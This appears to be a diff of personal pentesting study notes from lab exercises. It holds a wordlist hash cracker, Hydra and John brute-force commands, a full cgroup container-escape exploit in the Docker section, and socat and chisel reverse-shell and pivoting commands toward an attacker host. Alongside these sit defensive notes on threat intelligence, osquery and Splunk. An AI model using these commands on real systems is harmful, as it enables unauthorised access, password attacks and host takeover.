md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); 
sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h)
|
||||||
|
|
||||||
|
if len(jerar)==0:
|
||||||
|
|
||||||
|
print("\n Not Found.")
|
||||||
|
elif len(jerar)>2:
|
||||||
|
jerar.sort()
|
||||||
|
print("\nPossible Hashs:")
|
||||||
|
print("[+] "+str(algorithms[jerar[0]]))
|
||||||
|
print("[+] "+str(algorithms[jerar[1]]))
|
||||||
|
print("\nLeast Possible Hashs:")
|
||||||
|
for a in range(int(len(jerar))-2):
|
||||||
|
print("[+] "+str(algorithms[jerar[a+2]]))
|
||||||
|
else:
|
||||||
|
jerar.sort()
|
||||||
|
print("\nPossible Hashs:")
|
||||||
|
for a in range(len(jerar)):
|
||||||
|
print("[+] "+str(algorithms[jerar[a]]))
|
||||||
|
|
||||||
|
first = None
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print("\n\n\tBye!")
|
||||||
|
exit()
|
|
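--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,20 @@
+#!/usr/bin/env python
+
+import hashlib
+import pyfiglet
+
+print(pyfiglet.figlet_format("md5 cracker"))
+
+wordlist_location = str(input("Wordlist file location: "))
+hash_input = str(input("Enter hash to be cracked: "))
+
+with open(wordlist_location, 'rb') as _f:
+    for line in _f.readlines():
+        line = line.strip()
+        hash_ob = hashlib.sha256(line)
+        #hash_ob = hashlib.md5(line)
+        hashed_pass = hash_ob.hexdigest()
+        print(line)
+        if hashed_pass == hash_input:
+            print("Password found: " + line.decode())
+            exit(0)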
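Review bot: The comparison on the `if hashed_pass == hash_input:` line is byte-for-byte against a lowercase hexdigest, so a pasted hash with trailing whitespace or uppercase hex digits never matches; normalise the input once, `hash_input = input("Enter hash to be cracked: ").strip().lower()`. The banner prints "md5 cracker" while the live code uses `hashlib.sha256` and the md5 line is commented out, so the output misstates the algorithm actually compared — either make the algorithm a parameter or fix the banner text. `_f.readlines()` reads the whole wordlist into memory; iterating the file object directly, `for line in _f:`, streams it line by line. Printing every candidate with `print(line)` makes the loop I/O-bound and is probably a leftover debug statement.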
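--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,2 @@
+ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
+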
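--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1 @@
+Subproject commit 5e1d37c82e8f5fc3588c10d9920c07ae6a71a0ce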
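--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,8 @@
+# John The Ripper
+
+# Usage
+
+* Example
+```
+john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
+```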
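--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,37 @@
+# Hydra usage
+
+## Examples
+
+* HTTP post form
+```sh
+hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
+```
+* HTTP basic auth
+```sh
+hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
+```
+
+
+|Command|Description|
+|-------|-----------|
+|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
+|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
+|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
+|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
+
+## Parameter
+
+|Option|Decription|
+|------|----------|
+|-l|Single username|
+|-P|Indicates use the following wordlist|
+|http-post-form|indicates the method|
+|/login url|the login URL|
+|:username|the form field where the username is entered|
+|^USER^|tells Hydra to use the username from -l|
+|password|the formfield where the password is entered|
+|^PASS^|tells Hydra to use the wordlist from -P|
+|Login|indicates to Hydra the login failed message|
+|Login failed|is the login failure message that the form returns|
+|F=incorrect|If this word appears on the page, login failed|
+|-V| verbose|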
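--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1 @@
+Subproject commit 9f1820d33e0051cdfc5572f8b24700bb2430f9df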
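--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,3 @@
+# Shell Scripting
+
+[Bash Cheatsheet](https://devhints.io/bash)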
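--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1 @@
+Subproject commit c7d121b3d72aeaded26d5731819afaf49b686df6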
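--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,117 @@
+# Docker Vulnerabilities
+
+## Abusing Registry
+* [Registry Doc](https://docs.docker.com/registry/spec/api/)
+* Registry is a json API endpoint
+* Private registry added in `/etc/docker/daemon.json`
+* Can be found by nmap as a service
+
+### Enumeration
+* General query
+```sh
+curl http://test.com:5000/v2/_catalog`
+```
+* List tags
+```sh
+curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
+```
+* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
+```sh
+curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
+```
+
+## Reversing Docker Images
+* [Dive](https://github.com/wagoodman/dive)
+```sh
+dive <IMAGE-ID>
+```
+
+## Uploading Images to Registry
+* Ever image has a `latest` tag
+* Upload modified docker image as `latest`
+* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
+
+## RCE via Exposed Docker Daemon
+* Users inside the `docker` group may open tcp socket through docker
+* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
+* Confirming via `curl http://test.com:2375/version` on open docker port
+* Execute commands on socket
+```sh
+docker -H tcp://test.com:2375 ps
+docker -H tcp://test.com:2375 exec <container> <cmd>
+```
+
+* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
+
+## Escape Container via Exposed Docker Daemon
+* Looking for exposed docker sockets
+```sh
+find / -name "*sock"
+groups
+```
+
+* Mount the host volume and chroot to it, need alpine image
+```sh
+docker run -v /:/mnt --rm -it alpine chroot /mnt sh
+```
+
+## Shared Namespaces
+* Namespaces
+* Cgroups
+* OverlayFS
+
+* Requires root inside the container
+
+* Execute command
+```sh
+nsenter --target 1 --mount sh
+```
+
+## Misconfiguration
+* Privileged container connect to the host directly, not through the docker engine
+* Execution of bins on the host from libs inside the container is possible
+```sh
+capsh --print
+```
+* `man capabilities`
+
+* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
+
+* Exploit
+```sh
+mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+echo 1 > /tmp/cgrp/x/notify_on_release
+host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
+echo "$host_path/exploit" > /tmp/cgrp/release_agent
+echo '#!/bin/sh' > /exploit
+echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
+chmod a+x /exploit
+sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
+```
+## Dirty c0w
+https://github.com/dirtycow/dirtycow.github.io
+
+## runC
+[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
+
+## Securing a Container
+* Least Privileges
+* Seccomp
+* Securing Registry via TLS
+
+## Checking if you are inside a container
+* Low process count
+```sh
+ps aux
+```
+
+* `.dockerenv` in `/`
+```sh
+cd / && ls -lah
+```
+
+* cgroups contain docker names
+```sh
+pwd /proc/1
+cat cgroups
+```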
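--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,11 @@
+# GitTools
+
+* extract commits from repo
+```sh
+./extractor.sh <repo_with_.git> <targetdir>
+```
+* List `commit-meta.txt` files from all commits
+```sh
+separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"
+```
+* Compare hashes of the commits. The one without a parent is the oldest one.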
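--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,47 @@
+# Threat Intelligence
+Data must be analyzed to be considered threat intelligence. Once analyzed and actionable, then it becomes threat intelligence. The data needs context around to become intel.
+
+
+__Cyber Thread Intelligence (CTI)__ is a precautionary measure that companies use or contribute to so that other corporations do not get hit with the same attacks. Of course, adversaries change their TTPs all the time so the TI landscape is constantly changing.
+
+Vendors and corporations will sometimes share their collected CTI in what are called __ISACs__ or __Information Sharing and Analysis Centers__. __ISACs__ collect various indicators of an adversary that other corporations can use as a precaution against adversaries.
+
+
+Threat Intelligence is also broken up into three different types.
+
+* Strategic
+* Assist senior management make informed decisions specifically about the security budget and strategies.
+
+* Tactical
+* Interacts with the TTPs and attack models to identify adversary attack patterns.
+
+* Operational
+* Interact with IOCs and how the adversaries operationalize.
+
+
+
+## Advance Persistent Threats (APTs)
+* https://www.fireeye.com/current-threats/apt-groups.html
+
+## TTP
+TTP is an acronym for Tactics, Techniques, and Procedures, but what does each of these terms mean?
+
+* The __Tactic__ is the adversary's goal or objective.
+* The __Technique__ is how the adversary achieves the goal or objective.
+* The __Procedure__ is how the technique is executed.
+
+TI is an acronym for Threat Intelligence. Threat Intelligence is an overarching term for all collected information on adversaries and TTPs. You will also commonly hear CTI or Cyber Threat Intelligence which is just another way of saying Threat Intelligence.
+
+## Indicator of Compromise
+* __IOCs__ is an acronym for __Indicators of Compromise__, the indicators for malware and adversary groups. Indicators can include file hashes, IPs, names, etc.
+
+## Information Sharing and Analysis Centers (ISACs)
+According to the National Council of __ISACs__, "Information Sharing and Analysis Centers (ISACs) are member-driven organizations, delivering all-hazards threat and mitigation information to asset owners and operators". ISACs can be community-centered or vendor-specific. ISACs include CTI from threat actors as well as mitigation information in the form of IOCs, YARA rules, etc. ISACs maintain situational awareness by sharing and collaborating to maintain CTI, through a National Council of ISACs.
+
+* ISACs
+* [US-CERT](https://us-cert.cisa.gov/)
+* [AlienVault OTX](https://otx.alienvault.com/)
+* [ThreatConnect](https://threatconnect.com/)
+* [MISP](https://www.misp-project.org/)
+
+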
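--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,65 @@
+# Osquery
+
+* [Documentation](https://osquery.readthedocs.io/en/stable/)
+* [Schema Docs](https://osquery.io/schema/4.7.0/)
+
+## Usage
+* `.help` is the overiew
+
+### List available tables
+```sh
+.tables
+```
+* Specify via `.tables <tablename>`
+
+### Show schema
+```sh
+.schema <table_name>
+```
+* Show schema for foreign operating systems via `--enable_foreign`
+
+### Queries
+
+* Select
+```sql
+select * from <table>;
+select * <attr>,<attr> from <table>;
+```
+
+* UPDATE and DELETE is possible on run-time tables
+
+* JOIN
+```sql
+SELECT pid, name, path FROM osquery_info JOIN processes USING (pid);
+```
+
+* Where clause operators
+* `=` [equal]
+* `<>` [not equal]
+* `>, >=` [greater than, greater than or equal to]
+* `<, <=` [less than or less than or equal to]
+* `BETWEEN` [between a range]
+* `LIKE` [pattern wildcard searches]
+* `%` [wildcard, multiple characters]
+* `_` [wildcard, one character]
+
+* Matching wildcard rules
+* `%`: Match all files and folders for one level.
+* `%%`: Match all files and folders recursively.
+* `%abc`: Match all within-level ending in "abc".
+* `abc%`: Match all within-level starting with "abc".
+
+## Remote Queries via Frontend
+* [Repo](https://github.com/fleetdm/fleet.git)
+
+## Extensions
+* [osquery-extensions](https://github.com/trailofbits/osquery-extensions)
+* [osq-ext-bin](https://github.com/polylogyx/osq-ext-bin)
+
+### Yara
+```sql
+select * from yara where sigfile='<sigfile>' and path like '/home/%%';
+```
+* [Docs](https://osquery.readthedocs.io/en/stable/deployment/yara/)
+
+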
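--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,18 @@
+# Security Information and Event Management (SIEM)
+
+* [Varonis](https://www.varonis.com/blog/what-is-siem/)
+
+* Threat detection
+* Investigation
+* Time to respond
+* Some other SIEM features:
+* Basic security monitoring
+* Advanced threat detection
+* Forensics & incident response
+* Log collection
+* Normalization
+* Notifications and alerts
+* Security incident detection
+* Threat response workflow
+
+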
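--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,63 @@
+# Splunk
+
+
+## Splunk Bar
+* Messages
+* Settings
+* Activity
+* Help
+* Find
+
+## Search & Reporting
+* Tip: If you want to land into the Search app upon login automatically, you can do so by editing the user-prefs.conf file.
+```sh
+C:\Program Files\Splunk\etc\apps\user-prefs\default\user-prefs.conf
+/opt/splunk/etc/apps/user-pref/default/user-prefs.conf
+```
+* [Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthesearchapp)
+* [Start searching](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Startsearching)
+* [Time range picker](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthetimerangepicker)
+* [Field to search](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldstosearch)
+* [Use field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldlookups)
+* [Search field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Searchwithfieldlookups)
+* [Splunk Regex](https://docs.splunk.com/Documentation/Splunk/8.1.2/Knowledge/AboutSplunkregularexpressions)
+
+* Tabs
+* Event
+* Patterns
+* Statistics
+* Visualization
+
+## Adding Data
+* [Adding Data Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/Data/Getstartedwithgettingdatain#Use_apps_to_get_data_in)
+
+* `Settings > Data > Data Inputs` contains further sources
+* Add data after that via `Add Data`
+
+## Queries
+* [Metadata](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Metadata)
+* [Metalore](https://www.splunk.com/blog/2017/07/31/metadata-metalore.html)
+```sh
+| metadata type=sourcetypes index=botsv2 | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") | sort - totalCount
+```
+
+* Examples
+* Filtering HTTP sites visited for found IP
+```sh
+index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" | dedup site | table site
+```
+
+## Sigma
+* [Sigma Repo](https://github.com/Neo23x0/sigma)
+* [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches)
+* [Conversion](https://uncoder.io/)
+* E.g. : `sigma: APT29` as input
+
+## Dashboard
+```sh
+source="<source>" | top limit=5 EventID
+```
+* Visualization > choose Chart > "Save As" (top right) > DashboardName
+
+## Alerting
+* [Workflow](https://docs.splunk.com/Documentation/SplunkCloud/8.1.2012/Alert/AlertWorkflowOverview)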
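--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1 @@
+Subproject commit 0090ba2e51b7503c3245081894c0fc87b696f941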
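--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,42 @@
+# Methodology
+
+* Steps
+* Reconnaissance
+* Enumeration/Scanning
+* Gaining Access
+* Privilege Escalation
+* Covering Tracks
+* Reporting
+
+## Reconnaissance
+* Duck / SearX / metacrawler / google
+* Wikipedia
+* [Shodan.io](http://www.shodan.io)
+* PeopleFinder.com
+* who.is
+* sublist3r
+* hunter.io
+* builtwith.com
+* wappalyzer
+
+## Enumeration
+* nmap
+* nikto
+* gobuster
+* dirbuster
+* metasploit
+* enum4linux / linpeas / winpeas / linenum
+
+## Exploitation
+
+## Privilege Escalation
+
+## Covering Tracks
+
+## Reporting
+* Includes
+* Vulnerabilities
+* Criticality
+* Description
+* Countermeasures
+* Finding summary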
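--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,144 @@
+# Pivoting
+
+* Tunnelling/Proxying
+* Port Forwarding
+
+## Enumeration
+### Using material found on the machine and preinstalled tools
+* `arp -a`
+* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
+* `/etc/resolv.conf`
+* `ipconfig /all`
+* `nmcli dev show`
+### Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
+### Scripting Techniques
+```sh
+for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
+for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
+```
+* Using local tools through a proxy like `nmap`
+
+## Tools
+### Enumerating a network using native and statically compiled tools
+### Proxychains / FoxyProxy
+* Proxychains
+```sh
+proxychains nc <IP> <PORT>
+```
+* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
+```
+[ProxyList]
+# add proxy here ...
+# meanwhile
+# defaults set to "tor"
+socks4 127.0.0.1 9050
+# proxy_dns
+```
+* FoxyProxy
+
+### SSH port forwarding and tunnelling (primarily Unix)
+* LocalPortForwarding
+```sh
+ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
+```
+* Dynamic Port Forwarding
+```sh
+ssh -D <Port> <user>@<Jumpserver> -fN
+```
+* Reverse Proxy
+```sh
+ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
+```
+### plink.exe (Windows)
+* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
+```sh
+cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
+```
+* Key generation
+```sh
+puttygen <keyfile> -o key.ppk
+```
+
+### Socat
+* Reverse shell on target via
+```sh
+./socat tcp-l:8000 tcp:<attacker-IP>:443 &
+```
+* Attacking bind shell
+```sh
+sudo nc -lvnp 443
+```
+* Relay via Jumpserver
+```sh
+./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
+```
+* Quiet Port Forwarding
+* On attacker
+```sh
+socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
+```
+* On relay server
+```sh
+./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
+```
+* Open `localhost:8000`
+* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
+
+### Chisel
+* **Does not require SSH on target**
+* Reverse Proxy
+* Bind port on attacker
+```sh
+./chisel server -p <ListeningPort> --reverse &
+```
+* Reverse port on target/proxy
+```sh
+./chisel client <attacker-IP>:<attacker-Port> R:socks &
+```
+* `proxychains.conf` contains
+```sh
+[ProxyList]
+socks5 127.0.0.1 <Listening-Port>
+```
+
+* Forward SOCKS Proxy
+* Proxy/compromised machine
+```sh
+./chisel server -p <Listen-Port> --socks5
+```
+* On attacker
+```sh
+./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
+```
+* Remote Port Forward
+* On attacker
+```sh
+./chisel server -p <Listen-Port> --reverse &
+```
+* On forwarder
+```sh
+./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
+```
+* Local Port Forwarding
+* On proxy
+```sh
+./chisel server -p <Listen-Port>
+```
+* On attacker
+```sh
+./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
+```
+
+### sshuttle
+* `pip install sshuttle`
+* `sshuttle -r <user>@<target> <subnet/CIDR>`
+* or automatically determined
+```sh
+sshuttle -r <user>@<target> -N
+```
+* Key based auth
+```sh
+sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
+```
+* Exclude servers via `-x`, for example the target/gateway server
+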
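--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1 @@
+Subproject commit ce332b5b08d7249c21e121697b7b48d6414c2a18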
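--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1 @@
+Subproject commit 0dc0ff255a4bb07d2c2664ef6220137f7e40bb75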
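--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,4 @@
+# Command and Control
+
+* [Matrix](https://www.thec2matrix.com/)
+* [bcsecurity](https://www.bc-security.org/) maintains Empire 4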